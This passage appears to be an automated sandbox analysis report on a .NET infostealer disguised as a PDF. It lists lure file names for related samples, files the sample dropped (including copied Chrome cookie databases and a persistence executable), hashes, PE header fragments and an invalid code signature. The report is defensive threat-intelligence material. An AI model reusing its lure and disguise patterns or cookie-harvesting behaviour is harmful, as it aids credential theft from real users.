CN-Invoice-XXXXX9808-19011143287989.exe | malicious | coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
Download_quotation_PR #371073.exe | malicious | coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
CN-Invoice-XXXXX9808-19011143287990.exe | malicious | coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
PurchaseOrdersCSTtyres004786587.exe | malicious | coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

                                                    Domains


                                                    ASN


                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_A4-058000200390-_22b30012e2a9340b0356f203be6ce5a2ae6da_1d3dc762_18d9dc37\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16300
                                                    Entropy (8bit):3.7739596920682645
                                                    Encrypted:false
                                                    SSDEEP:192:GsimHBUZMXSaKsUAeZiN/u7sKS274ItAe:DjBUZMXSalmW/u7sKX4ItAe
                                                    MD5:BFC6839F910B613933C59C1C408AB511
                                                    SHA1:3A752F2786D7A4C4B1BF2677894502125A6C3FF4
                                                    SHA-256:E056EF80AEC8B461C658F26BEB6A29D854E53CD1BD7A9E263B7BE7855A9B2DCD
                                                    SHA-512:C1192932BA235A243B3CC95484BFB5FDFCB6AA605B2770EE77B615AAC7C280D521258803D0D3127E7B88B4B00AE0A7F7AD773FA94711CD486380F699C36D62D7
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_2b4ac1a517da4509e55ae841ecc74477b428236_b4418cc1_06f2fc1e\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15900
                                                    Entropy (8bit):3.7649375025832814
                                                    Encrypted:false
                                                    SSDEEP:192:uOqHtvimHBUZMXCaPceny+f//u7sQS274ItqyJ:+rBUZMXCaZ1X/u7sQX4ItHJ
                                                    MD5:E421DD977C9ACCD76C60ECB8AE32A548
                                                    SHA1:E3B3C3998B92175B4763727A9513CEFE834F0BF0
                                                    SHA-256:CEC02A18EDFD7B055CE595791181671353807F5E29DA76F5D0AFD79D8E57374C
                                                    SHA-512:AC42799DDFA745990EE3517B5CFF365B884252AC40CEC095694C98C0A895AA99A517CFE0B46EF7B3362C676ADF854B7A1543C4CE2A886D3CF3923D36EB56D013
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_2b4ac1a517da4509e55ae841ecc74477b428236_b4418cc1_10572409\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16034
                                                    Entropy (8bit):3.764375690354279
                                                    Encrypted:false
                                                    SSDEEP:192:XL0YuimHBUZMXCaKsUAeZiN/u7sQS274ItqyP:7LCBUZMXCalmW/u7sQX4ItHP
                                                    MD5:F1769CA11F15309841F7E4376B3D580C
                                                    SHA1:87103B768A82086FE79CC5BCFC8D23C32264C657
                                                    SHA-256:AD7B69EC995F5DA2E4EC465AEC239090C7EA678B5EDD017DDC2C29337E4D2D34
                                                    SHA-512:CE593B4F1D729A46BFE4370CFC22BF5115BCF5C53CB11487C07FA8E4FF98067536BBA6B4572A7E3D9DFE0FD7DCEE38A862E22ADB35B0BC81BAD0D6D037799D8B
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B46.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 08:47:58 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):302765
                                                    Entropy (8bit):3.7501461495282693
                                                    Encrypted:false
                                                    SSDEEP:3072:KXyGRBu0+jd+p8CdB2o+L9gIOgF5mvFLw0iUCgU+9hyzSXrZoS2n2:6RM07pMBL9RpD/JTjkZoI
                                                    MD5:A000F0418C09C6DFE2FA8CF3E45806AE
                                                    SHA1:173CFFD2421C0902FD15813E97FD1A559314430A
                                                    SHA-256:4BA5851D7F7F834D196899BA2A2405C8C0275430D64232403A7235F8710DF294
                                                    SHA-512:7C5B259F338A8E6C55885DAE7F1E53B73421C6C8475E4D6D2B9BB79FD952F3A72794795EED59C4E14ADF6E1B4BD152B91D7A6CAA185E111655BE8A85BFC2442C
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER94AB.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8392
                                                    Entropy (8bit):3.6919325540904246
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNi1A686YrUSUJF/3kgmfZ/SL+prf89bdEsf34/m:RrlsNiC686YoSUJFPkgmfxSfd3f3d
                                                    MD5:69D24C0DE770F1FBB89CF14B4CAD61FF
                                                    SHA1:386E6660CEED0015ADB616857717E69F349EF88C
                                                    SHA-256:C79E1F4339A7688879EC2C74C2DE5ABF36510C0AF0D63559F260D4399FEC13A7
                                                    SHA-512:A3632935FD493BAC148B09AE88EFFC7381C14490309F36724CA244D46AECE3CB9A584D01C561114735DDCEAB01228F5C6C7FBFF4E008D0D578F655556D7F9A07
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D76.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4668
                                                    Entropy (8bit):4.45014383346403
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsIJgtWI9kCWSC8BtrM8fm8M4JVFF1+q8v4ikuTnLk1d:uITfObDSNTxJ/KRkuTLk1d
                                                    MD5:1B069735485FAE6626BDB82BE56ECE84
                                                    SHA1:08C0D850CB9E91C6511A857B54DCA94B2E6A44A4
                                                    SHA-256:059DFE19594F15D04DFB9335C5528B675C7290D5A9404EB76798FDE4085821CF
                                                    SHA-512:FCA541047B5EA5F856FADE8FDE7C37D2A3E1D1079B65E7C6CAD44B2F98A5051ABF4F5A9FC760880064742E31A5539404D27E96ECC2BE1D327778A4FA9C7C5B83
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9B8.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Tue Feb 23 08:48:14 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):193940
                                                    Entropy (8bit):4.448803965702104
                                                    Encrypted:false
                                                    SSDEEP:3072:djiqj0AQJjd+pAzVaoSw9gIOgF5k0fUCgU7+5yj99zeC5:djic0v+pV/w9RpDk8Tji5mzp
                                                    MD5:E37220F5970C6AFAF37DDA42C9D32F79
                                                    SHA1:B3AFC7A3E37520DE2E5AA950631733216D7889C9
                                                    SHA-256:D6F1C84EF77F6E74B8942ED601F08ACECE24628CB9A33C4945B365AB73319BEC
                                                    SHA-512:66E0B129DD2F411AE30BBDC18FE5D57C19C7FBAFF82245E75F5706D7328E8F345FB589F519ABF0AE5825B44F60551AD96F9AD15028E9DB258EBCA3A66D3FB47C
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD95.tmp.dmp
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Tue Feb 23 08:47:05 2021, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):302765
                                                    Entropy (8bit):3.7370014275285786
                                                    Encrypted:false
                                                    SSDEEP:3072:08NFHoh0mS22jd+pYZbgdb9gIOgF5+x0QUCgUHtIaxFkoXh5zz:Rw0d2jpl9RpDCnTjVksP
                                                    MD5:EB89E5B3A234F9D666675CB4AECC16B4
                                                    SHA1:78EBFD8D672BB0036ADB41FDA3B2BE02898842FF
                                                    SHA-256:D2490217E8D12838ED35333A463C50E88AD204414D5E683702B985B2484024AA
                                                    SHA-512:4B3AF4757FE7FCA9E9BC65821D85B64AB489384206A3C7D8FD966149E7CD470BCF20B9DB0EEDCA1FFBCFB735BB5144ECCE614152466D4F9BFB7EF325346AAE54
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC218.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8472
                                                    Entropy (8bit):3.699376109781331
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiYp62h6YrzSUtjLgmfZ0SL+prz89btVsfxPm:RrlsNiO646YPSUtPgmfWSLtufE
                                                    MD5:D92949B08F55869B3317AB94B544C183
                                                    SHA1:3B03ED0D7E54A111D823C5834250C5B40F1C36C7
                                                    SHA-256:98F5474FE1DDCA8BE13E38FD95106E4BFD95024947D23901F1FF8F7DE8E68D17
                                                    SHA-512:64026B7D192950D2CBE9658BB0FAF6814F77278DD22EC158C71CBCF52EF89AB34FD119CA4D8104416ADE6A7F2EA416E9B6CB7D8F68FF743D1B5FB9D2FF8A6319
                                                    Malicious:false
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC4C9.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4775
                                                    Entropy (8bit):4.506028890634219
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsVJgtWI9kCWSC8BtCS8fm8M4JlJTFFa+q8vrT6NpkuTCbLHbOdd:uITfvbDSNEJlJ+KrenkuubLHbCd
                                                    MD5:14D89A4A3620137B9570FE2102ECC093
                                                    SHA1:A18E9CA9454AD6C9FEC3C783F3CD0392E98BB96E
                                                    SHA-256:61A04ADCC9BE1678AC749298DB86EDD21A072E5EE80E812D76D1D57B687A9798
                                                    SHA-512:785FC0EE3FC0956D469D533D7F096B577C0C751E665F13CA10217E0B0289517CA43A9BC24CED504F669DC0BB3586361DE07B6D74D2BE4E47C8F74A15181868AC
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873717" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD0F8.tmp.WERInternalMetadata.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8390
                                                    Entropy (8bit):3.693070169571263
                                                    Encrypted:false
                                                    SSDEEP:192:Rrl7r3GLNiIJ6z/6Yr4SUgoigmfZ/SL+prZ89bTIsfFRm:RrlsNi+6r6YESUgoigmfxSZT7fa
                                                    MD5:003FE21C083309777FEE70C441DE512E
                                                    SHA1:481527269D291C16D572DEBB12DA8A806B1CB6D5
                                                    SHA-256:1105C2A4B7A2AC515D456C90FB2FEA56F51D745BAE44C3016056473F0CB212DE
                                                    SHA-512:D221B22BB58C939089B41B804040F4EFFAC73EF467BE74ECCB1CA7CB15A97D761295D2574C40919D236CB705B6B32ACE63CCB930B689E80C03C68FCD5EC33F79
                                                    Malicious:false
                                                    Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.1.6.<./.P.i.d.>.......
                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERD510.tmp.xml
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4668
                                                    Entropy (8bit):4.451093760155469
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwSD8zsIJgtWI9kCWSC8Btj58fm8M4JVFFv+q8v4xkuTnLkEd:uITfObDSNr+JtKikuTLkEd
                                                    MD5:7B70D12BC87F48C2F4A7BF6AC2385298
                                                    SHA1:87E126B5D2A5DD8959F3B5EA8AF072D86A0604C3
                                                    SHA-256:D99021C388E63AB7F95DAC191F48ED36D0D31C681E926EEDB79E5D3093B33AEF
                                                    SHA-512:137880ED9E01DA92C0C5AEF38B53D8D78798F55ED96CA4D652864CB4B18D8AAF05327777B3EC6E1E8E1392B06F7C9D0B401533F4F19A0C582787F61D4DF6C2F1
                                                    Malicious:false
                                                    Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="873718" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                    C:\Users\user\AppData\Roaming\3pg5upzt.i5q\Chrome\Default\Cookies
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:modified
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.7006690334145785
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                    Malicious:false
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):20616
                                                    Entropy (8bit):6.63827426459457
                                                    Encrypted:false
                                                    SSDEEP:384:Mhwp6WjOxO7CLlbMq/JYogNGqQsKNAdAfpniHRlhFk:gSSbhxJFqtPAfpniHbh6
                                                    MD5:5AF8F94A752CA9996FBFBF01DCC30EDD
                                                    SHA1:B52D9BA9B7890E2B51E64AB889805CFCE5126EBB
                                                    SHA-256:B37D450B7D60FD2497AE794E9835B999339549406B1A05D92BB46A9F1A23EB12
                                                    SHA-512:69D91B22E3718AFA7CE31EEA7C474EA6E8862C114186C832CF0BB9C8E1CCE19B17275D01DC025DA9D98E58A08265E6BF22F8084A010C06B840C4AD123FC1375C
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 13%
                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..0...........N... ...`....@.. ...............................y....@.................................<N..O....`...............8............................................................... ............... ..H............text........ ...0.................. ..`.rsrc........`.......2..............@..@.reloc...............6..............@..B................pN......H........'...&...........................................................*".(.....*~s.........s.........s.........*B.(.......(.....*.0............(......(......(.....s......(......~....o..........%.r...pr...p~-...o!...(.....o.......+F+...&.........o...........,%..(......(......(.......(.....o.........X....i2..(...........%..o.......+...*..0...........s.....*.0..M..............%.r...pri..p~-...o!....%.rm..pr...p~-...o!.....s.....+...'.....o.....*....0............(.....r...pr..
                                                    C:\Users\user\AppData\Roaming\NewApp\NewApp.exe:Zone.Identifier
                                                    Process:C:\Users\user\Desktop\A4-058000200390-10-14_REV_pdf.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                    C:\Users\user\AppData\Roaming\aldkfvcd.2z0\Chrome\Default\Cookies
                                                    Process:C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                    Category:dropped
                                                    Size (bytes):20480
                                                    Entropy (8bit):0.7006690334145785
                                                    Encrypted:false
                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                    MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                    SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                    SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                    SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                    Malicious:false
                                                    Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):6.63827426459457
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                    • Win32 Executable (generic) a (10002005/4) 49.97%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:A4-058000200390-10-14_REV_pdf.exe
                                                    File size:20616
                                                    MD5:5af8f94a752ca9996fbfbf01dcc30edd
                                                    SHA1:b52d9ba9b7890e2b51e64ab889805cfce5126ebb
                                                    SHA256:b37d450b7d60fd2497ae794e9835b999339549406b1a05d92bb46a9f1a23eb12
                                                    SHA512:69d91b22e3718afa7ce31eea7c474ea6e8862c114186c832cf0bb9c8e1cce19b17275d01dc025da9d98e58a08265e6bf22f8084a010c06b840c4ad123fc1375c
                                                    SSDEEP:384:Mhwp6WjOxO7CLlbMq/JYogNGqQsKNAdAfpniHRlhFk:gSSbhxJFqtPAfpniHbh6
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....F...............0..0...........N... ...`....@.. ...............................y....@................................

                                                    File Icon

                                                    Icon Hash:00828e8e8686b000

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x404e8e
                                                    Entrypoint Section:.text
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x88460DE1 [Fri Jun 13 17:14:09 2042 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Authenticode Signature

                                                    Signature Valid:false
                                                    Signature Issuer:C=????????????????????????????????????????, S=&#225;&#175;&#138;&#225;&#175;&#153;&#225;&#175;&#167;&#225;&#175;&#179;&#225;&#175;&#142;&#225;&#175;&#140;&#225;&#175;&#147;&#225;&#175;&#150;&#225;&#175;&#167;&#225;&#175;&#166;&#225;&#175;&#165;&#225;&#175;&#134;&#225;&#175;&#144;&#225;&#175;&#137;&#225;&#175;&#144;&#225;&#175;&#163;&#225;&#175;&#141;&#225;&#175;&#134;&#225;&#175;&#169;&#225;&#175;&#132;&#225;&#175;&#175;&#225;&#175;&#183;&#225;&#175;&#162;&#225;&#175;&#150;&#225;&#175;&#146;&#225;&#175;&#139;&#225;&#175;&#145;&#225;&#175;&#146;&#225;&#175;&#176;&#225;&#175;&#187;&#225;&#175;&#142;&#225;&#175;&#138;&#225;&#175;&#187;&#225;&#175;&#132;&#225;&#175;&#131;&#225;&#175;&#179;&#225;&#175;&#131;&#225;&#175;&#173;&#225;&#175;&#150;&#225;&#175;&#166;&#225;&#175;&#183;&#225;&#175;&#151;&#225;&#175;&#183;&#225;&#175;&#139;&#225;&#175;&#137;&#225;&#175;&#138;&#225;&#175;&#140;, L=&#233;&#158;&#134;&#233;&#158;&#147;&#233;&#158;&#146;&#233;&#158;&#177;&#233;&#158;&#189;&#233;&#158;&#184;&#233;&#158;&#154;&#233;&#158;&#148;&#233;&#158;&#155;&#233;&#158;&#172;&#233;&#158;&#145;&#233;&#158;&#166;, T=&#237;&#133;&#174;&#237;&#133;&#132;&#237;&#133;&#140;&#237;&#133;&#133;&#237;&#133;&#129;&#237;&#133;&#137;&#237;&#133;&#176;&#237;&#133;&#143;&#237;&#133;&#142;&#237;&#132;&#191;&#237;&#133;&#148;&#237;&#132;&#189;&#237;&#133;&#147;&#237;&#133;&#181;&#237;&#133;&#161;&#237;&#133;&#146;&#237;&#133;&#142;&#237;&#133;&#161;&#237;&#133;&#133;&#237;&#133;&#171;&#237;&#133;&#168;&#237;&#133;&#146;&#237;&#133;&#140;&#237;&#133;&#160;&#237;&#133;&#146;&#237;&#133;&#139;&#237;&#133;&#132;&#237;&#133;&#158;&#237;&#133;&#163;&#237;&#133;&#164;&#237;&#133;&#136;&#237;&#133;&#159;&#237;&#133;&#178;&#237;&#133;&#143;&#237;&#133;&#177;&#237;&#133;&#182;&#237;&#133;&#163;&#237;&#133;&#166;&#237;&#133;&#172;&#237;&#133;&#131;&#237;&#132;&#191;&#237;&#133;&#131;&#237;&#133;&#139;&#237;&#133;&#169;, E=???????????, OU=&#231;&#177;&#152;&#231;&#177;&#184;&#231;&#177;&#180;&#231;&#177;&#189;&#231;&#177;&#157;&#231;&#177;&#149;&#231;&#177;&#151;&#231;&#177;&#164;&#231;&#177;&#169;&#231;&#178;&#139;&#231;&#177;&#164;&#231;&#178;&#132;&#231;&#178;&#140;&#231;&#178;&#132;&#231;&#177;&#156;&#231;&#178;&#140;&#231;&#177;&#152;&#231;&#177;&#189;&#231;&#177;&#181;&#231;&#178;&#130;&#231;&#177;&#162;&#231;&#177;&#160;&#231;&#177;&#180;&#231;&#178;&#134;&#231;&#177;&#168;, O=&#235;&#158;&#169;&#235;&#158;&#189;&#235;&#158;&#185;&#235;&#158;&#166;&#235;&#158;&#175;&#235;&#158;&#185;&#235;&#158;&#133;&#235;&#158;&#176;&#235;&#158;&#137;&#235;&#158;&#143;&#235;&#158;&#183;&#235;&#158;&#174;&#235;&#158;&#177;&#235;&#158;&#187;&#235;&#158;&#171;&#235;&#158;&#133;&#235;&#158;&#184;, CN=&#236;&#176;&#159;&#236;&#176;&#168;&#236;&#176;&#179;&#236;&#176;&#180;&#236;&#176;&#145;&#236;&#176;&#183;&#236;&#176;&#182;&#236;&#176;&#180;&#236;&#176;&#159;&#236;&#176;&#142;&#236;&#176;&#153;&#236;&#176;&#151;&#236;&#176;&#169;&#236;&#176;&#178;&#236;&#176;&#175;&#236;&#176;&#153;&#236;&#176;&#147;&#236;&#176;&#145;&#236;&#176;&#172;
                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                    Error Number:-2146762487
                                                    Not Before, Not After
                                                    • 2/22/2021 10:04:11 PM 2/22/2022 10:04:11 PM
                                                    Subject Chain
